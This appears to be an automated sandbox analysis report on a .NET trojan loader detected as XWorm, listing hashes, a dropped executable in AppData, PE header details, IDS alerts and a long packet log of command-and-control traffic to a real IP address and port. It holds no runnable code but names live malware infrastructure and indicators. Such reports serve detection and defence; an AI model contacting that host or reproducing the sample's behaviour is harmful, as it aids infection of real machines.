                      SSDEEP:12288:yg/dslRnGwJu7swwXkKz9gD6dFd2yARiLBIDEAm7AZKzK0ffrrgc8c+:yg/dslRGOu7jwUHD6d/yR7reBfffr0c8
                      MD5:DC674885E842E9C05644CE23F5D8B665
                      SHA1:82B33F0734FA62DDD93F1DFDC34285E8713B3E66
                      SHA-256:EA098F4397146A44801177898A66A0DA04690D51A242C5687B5E2D33AFAE1BFD
                      SHA-512:026D5A4D508813708C31AE9BD3C0CEB245E6553360B94200467EF86814FB47890C321BA907379402255E3C8F57F3B75DE926D8F9AB9EE7B278C783A1126871E7
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 32%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............@.................................X...S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......tu...h...........................................................0..A....... >........%.....(......... J........%.?...(.....@...(E...*.....&*....0..@........r...ps....}......}......}....+..(.......( .....(.....+..(.....*..*...*...*...*...*...*...*..0...........s|.....o......(.....*...0...........s......o......(.....*...0...........s$.....o......(.....*...0...........s......o......(.....*...0...........sI.....o......(.....*...0..........~@..........E...................

                      C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):641536
                      Entropy (8bit):7.707880699127507
                      Encrypted:false
                      SSDEEP:12288:yg/dslRnGwJu7swwXkKz9gD6dFd2yARiLBIDEAm7AZKzK0ffrrgc8c+:yg/dslRGOu7jwUHD6d/yR7reBfffr0c8
                      MD5:DC674885E842E9C05644CE23F5D8B665
                      SHA1:82B33F0734FA62DDD93F1DFDC34285E8713B3E66
                      SHA-256:EA098F4397146A44801177898A66A0DA04690D51A242C5687B5E2D33AFAE1BFD
                      SHA-512:026D5A4D508813708C31AE9BD3C0CEB245E6553360B94200467EF86814FB47890C321BA907379402255E3C8F57F3B75DE926D8F9AB9EE7B278C783A1126871E7
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 32%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............@.................................X...S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......tu...h...........................................................0..A....... >........%.....(......... J........%.?...(.....@...(E...*.....&*....0..@........r...ps....}......}......}....+..(.......( .....(.....+..(.....*..*...*...*...*...*...*...*..0...........s|.....o......(.....*...0...........s......o......(.....*...0...........s$.....o......(.....*...0...........s......o......(.....*...0...........sI.....o......(.....*...0..........~@..........E...................

                      C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.707880699127507
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File size:641'536 bytes
                      MD5:dc674885e842e9c05644ce23f5d8b665
                      SHA1:82b33f0734fa62ddd93f1dfdc34285e8713b3e66
                      SHA256:ea098f4397146a44801177898a66a0da04690d51a242c5687b5e2d33afae1bfd
                      SHA512:026d5a4d508813708c31ae9bd3c0ceb245e6553360b94200467ef86814fb47890c321ba907379402255e3c8f57f3b75de926d8f9ab9ee7b278c783a1126871e7
                      SSDEEP:12288:yg/dslRnGwJu7swwXkKz9gD6dFd2yARiLBIDEAm7AZKzK0ffrrgc8c+:yg/dslRGOu7jwUHD6d/yR7reBfffr0c8
                      TLSH:03D4D08C77BAEF96D53963F5A552862043F8912A1169F7430FCB28D61EE4FC08642F87
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............@................................

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x49deae
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x669907A4 [Thu Jul 18 12:16:36 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9de580x53.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x600.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x9beb40x9c0002dbb94c188855840329073fd36f7c3c3False0.8617757161458334data7.717538065664358IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0x9e0000x6000x6004bd78149f85eec5346f367bfc2049fa4False0.3971354166666667data3.937337695651304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0xa00000xc0x200e0c8eaabc21b0e87a0902c4bdc54af4eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_VERSION0x9e0900x2ccdata0.42877094972067037
                      RT_MANIFEST0x9e36c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      07/18/24-16:29:27.355688TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound4971730608192.168.2.6193.161.193.99
                      07/18/24-16:32:34.193805TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M23060849717193.161.193.99192.168.2.6
                      07/18/24-16:31:23.445768TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound4971730608192.168.2.6193.161.193.99
                      07/18/24-16:33:12.637857TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4971730608192.168.2.6193.161.193.99
                      07/18/24-16:33:12.636916TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes3060849717193.161.193.99192.168.2.6

                      Suricata IDS Alerts

                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                      2024-07-18T16:33:12.637857+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4971730608192.168.2.6193.161.193.99
                      2024-07-18T16:31:23.445768+0200TCP2853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound4971730608192.168.2.6193.161.193.99
                      2024-07-18T16:32:34.193805+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23060849717193.161.193.99192.168.2.6
                      2024-07-18T16:29:27.355688+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound4971730608192.168.2.6193.161.193.99
                      2024-07-18T16:33:12.636916+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3060849717193.161.193.99192.168.2.6

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 18, 2024 16:29:13.487385988 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:29:13.492921114 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:13.493587971 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:29:13.629247904 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:29:13.635699034 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:27.355688095 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:29:27.428329945 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:27.554425955 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:27.567519903 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:29:27.576073885 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:34.198345900 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:34.242753029 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:29:41.087537050 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:29:41.092555046 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:41.297314882 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:41.299422979 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:29:41.304619074 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:54.820888996 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:29:54.922601938 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:55.127940893 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:29:55.129987955 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:29:55.135632038 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:04.189519882 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:04.242769003 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:08.555394888 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:08.560388088 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:08.775293112 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:08.777447939 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:08.782358885 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:21.336842060 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:21.570595980 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:21.883080006 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:22.492554903 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:22.740978956 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:22.741003990 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:22.741018057 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:22.745438099 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:22.762067080 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:22.765391111 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:22.783134937 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:34.184864044 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:34.226819992 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:34.618174076 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:34.645555973 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:34.982320070 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:34.983603954 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:34.988444090 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:36.602232933 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:36.607105017 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:36.617705107 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:36.622838020 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:36.633368015 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:36.638298988 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:36.648982048 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:36.654597998 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:38.813067913 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:38.817481041 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:38.822309971 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:39.098556995 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:39.101521969 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:39.106756926 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:39.107307911 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:39.112099886 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:41.196535110 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:41.201493025 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:41.417488098 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:41.424334049 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:41.429658890 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:50.414748907 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:50.419939041 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:50.654576063 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:30:50.656250954 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:30:50.661139965 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:02.494404078 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:02.500613928 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:02.703906059 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:02.709753036 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:02.714626074 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:04.217555046 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:04.258137941 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:12.995951891 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:13.009941101 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:13.215209007 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:13.216839075 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:13.221843004 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.367822886 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.373306990 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.414602995 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.420936108 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.445768118 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.450705051 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.477205038 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.482254028 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.508318901 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.513127089 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.539556026 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.544536114 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.555085897 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.560534954 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.572093964 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.573987961 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.621917009 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.621973991 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.626873016 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.633261919 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.638132095 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.688447952 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.690767050 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.695584059 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.839693069 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.843233109 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.850184917 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.853801012 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.858954906 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.939542055 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.941126108 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.946430922 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.946566105 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.953340054 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:24.046614885 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:24.048177958 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:24.053240061 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:24.053361893 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:24.059273958 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:29.118061066 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:29.123060942 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:29.315830946 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:29.317430973 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:29.323103905 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:30.758411884 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:30.764204979 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:30.963411093 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:30.965291977 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:30.971497059 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.272398949 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.320586920 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.820832014 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.826246023 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.852128983 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.859281063 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.899091005 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.907630920 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.914777994 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.919703007 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.992805958 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.997751951 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.024141073 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.029128075 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.040916920 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.043380976 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.089745998 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.102139950 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.107712984 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.117832899 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.122678041 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.149064064 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.154210091 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.156157970 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.158185959 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.216897011 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.216965914 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.235677958 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.277107000 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.278616905 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.283677101 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.283736944 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.290210009 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.431416035 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.433367968 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.438570023 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.438625097 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.443837881 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.477174044 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.483577967 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.492719889 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.497642040 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.535203934 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.536787033 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.542251110 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.542298079 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.547162056 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.646959066 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.648490906 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.653728962 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.771608114 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.775208950 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.780330896 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.874428988 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.879251003 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.884109020 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:40.589730024 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:40.595484972 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:41.070493937 CEST3060849717193.161.193.99192.168.2.6
